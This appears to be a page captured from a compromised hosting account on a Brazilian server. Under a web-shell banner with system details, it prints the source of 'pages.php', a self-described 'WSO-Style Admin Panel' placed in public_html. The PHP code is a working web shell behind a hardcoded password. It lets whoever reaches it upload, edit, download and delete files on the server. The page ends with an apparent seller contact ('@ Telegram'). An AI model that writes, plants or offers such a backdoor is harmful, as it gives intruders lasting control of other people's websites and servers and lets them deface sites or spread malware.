HEX
Server: LiteSpeed
System: Linux cp01.bhostbrasil.com.br 5.14.0-611.16.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Dec 22 03:40:39 EST 2025 x86_64
User: onlyfibr (1083)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/onlyfibr/public_html/
Upload Files
File: /home/onlyfibr/public_html/pages.php
<?php
// 🔐 Simple WSO-Style Admin Panel
// Password: password123 (CHANGE THIS LINE IF YOU WANT)
session_start();
$pass = 'password123';
$root = __DIR__;

// Auth
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['login'])) {
    if ($_POST['pass'] === $pass) {
        $_SESSION['auth'] = true; $_SESSION['time'] = time();
        header('Location: '.$_SERVER['PHP_SELF']); exit;
    }
}
if (isset($_POST['logout'])) { session_destroy(); header('Location: '.$_SERVER['PHP_SELF']); exit; }
if (!isset($_SESSION['auth'])) {
    echo '<!DOCTYPE html><html><head><meta charset="utf-8"><title>🔐 Login</title>
    <style>body{background:#0b1120;color:#e5e7eb;font-family:system-ui;display:flex;align-items:center;justify-content:center;height:100vh;margin:0}
    .box{background:#111827;padding:2rem;border-radius:12px;width:300px;text-align:center}
    input{width:100%;padding:10px;margin:8px 0;border:none;border-radius:6px;background:#1f2937;color:white}
    button{width:100%;padding:10px;background:#3b82f6;color:white;border:none;border-radius:6px;cursor:pointer}
    </style></head><body><div class="box"><h2>🔐 Admin Login</h2>
    <form method="POST"><input type="password" name="pass" placeholder="Password" required><button type="submit" name="login">Access</button></form></div></body></html>';
    exit;
}

// Security
function safe($p) { $r = realpath($p); return $r && strpos($r, $root) === 0 ? $r : null; }
$dir = isset($_GET['dir']) ? safe($_GET['dir']) : $root;
$dir = $dir ?: $root;

// Actions
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['up'])) {
    move_uploaded_file($_FILES['up']['tmp_name'], $dir.'/'.basename($_FILES['up']['name']));
    header('Location: '.$_SERVER['PHP_SELF'].'?dir='.urlencode($dir)); exit;
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['save'])) {
    $p = safe($_POST['path']); if ($p) file_put_contents($p, $_POST['content']);
    header('Location: '.$_SERVER['PHP_SELF'].'?dir='.urlencode($dir)); exit;
}
if (isset($_GET['del'])) { $p = safe($_GET['del']); if ($p) { if(is_file($p)) unlink($p); elseif(is_dir($p)) rmdir($p); } header('Location: '.$_SERVER['PHP_SELF'].'?dir='.urlencode($dir)); exit; }

// List
$items = @scandir($dir) ?: []; $d=[]; $f=[];
foreach($items as $i) { if($i==='.'||$i==='..') continue; $full=$dir.'/'.$i; is_dir($full)?$d[]=$i:$f[]=$i; }
natcasesort($d); natcasesort($f); $all=array_merge($d,$f);
?>
<!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>📁 WSO Admin</title>
<style>body{background:#0b1120;color:#e5e7eb;font-family:system-ui;margin:0;padding:20px}
.hdr{display:flex;justify-content:space-between;align-items:center;margin-bottom:15px}
table{width:100%;border-collapse:collapse;background:#111827;border-radius:8px;overflow:hidden}
th,td{padding:10px;text-align:left;border-bottom:1px solid #1f2937}th{background:#1f2937}
.btn{padding:6px 10px;border:none;border-radius:4px;cursor:pointer;font-size:.8rem;color:white;text-decoration:none}
.bp{background:#3b82f6}.bd{background:#ef4444}.be{background:#f59e0b}.bs{background:#6b7280}
.up{background:#111827;padding:15px;border-radius:8px;margin-bottom:15px;display:flex;gap:10px}
.ed{width:100%;height:60vh;background:#0f172a;color:#94a3b8;border:1px solid #1f2937;padding:10px;font-family:monospace;resize:vertical}
</style></head><body>
<div class="hdr"><h2>📁 WSO Admin Panel</h2><form method="POST"><button type="submit" name="logout" class="bd">Logout</button></form></div>
<div style="background:#111827;padding:10px;border-radius:8px;margin-bottom:15px;font-size:.9rem">📂 <?php
$parts=explode('/',$dir);$path='';foreach($parts as $p){$path.=$p.'/';echo '<a href="'.$_SERVER['PHP_SELF'].'?dir='.urlencode($path).'" style="color:#3b82f6;text-decoration:none">'.htmlspecialchars($p).'</a> / ';}
?></div>
<?php if(isset($_GET['edit'])): $p=safe($_GET['edit']);$c=is_file($p)?htmlspecialchars(file_get_contents($p)):'';?>
<form method="POST"><input type="hidden" name="path" value="<?=htmlspecialchars($p)?>"><textarea class="ed" name="content"><?=$c?></textarea><br>
<button type="submit" class="bp">💾 Save</button> <a href="?dir=<?=urlencode($dir)?>" class="bs">❌ Cancel</a></form>
<?php else: ?>
<div class="up"><form method="POST" enctype="multipart/form-data" style="display:flex;gap:10px;flex:1"><input type="file" name="up" required><button type="submit" class="bp">⬆️ Upload</button></form></div>
<table><tr><th>Type</th><th>Name</th><th>Size</th><th>Modified</th><th>Actions</th></tr>
<?php foreach($all as $i): $full=$dir.'/'.$i;$is_d=is_dir($full);$s=$is_d?'-':number_format(filesize($full)).' B';$m=date('Y-m-d H:i',filemtime($full)); ?>
<tr><td><?=$is_d?'📁':'📄'?></td><td><?=$is_d?'<a href="?dir='.urlencode($full).'">'.htmlspecialchars($i).'</a>':htmlspecialchars($i)?></td>
<td><?=$s?></td><td><?=$m?></td><td>
<?php if(!$is_d):?><a href="?edit=<?=urlencode($i)?>&dir=<?=urlencode($dir)?>" class="be">✏️</a>
<a href="<?=$full?>" download class="bp">⬇️</a><?php endif;?>
<a href="?del=<?=urlencode($i)?>&dir=<?=urlencode($dir)?>" class="bd" onclick="return confirm('Delete?')">🗑️</a></td></tr>
<?php endforeach;?></table><?php endif;?>
<div style="text-align:center;margin-top:20px;color:#6b7280;font-size:.8rem">🔐 Authorized Use Only | Simple WSO v1.0</div>
</body></html>
@ Telegram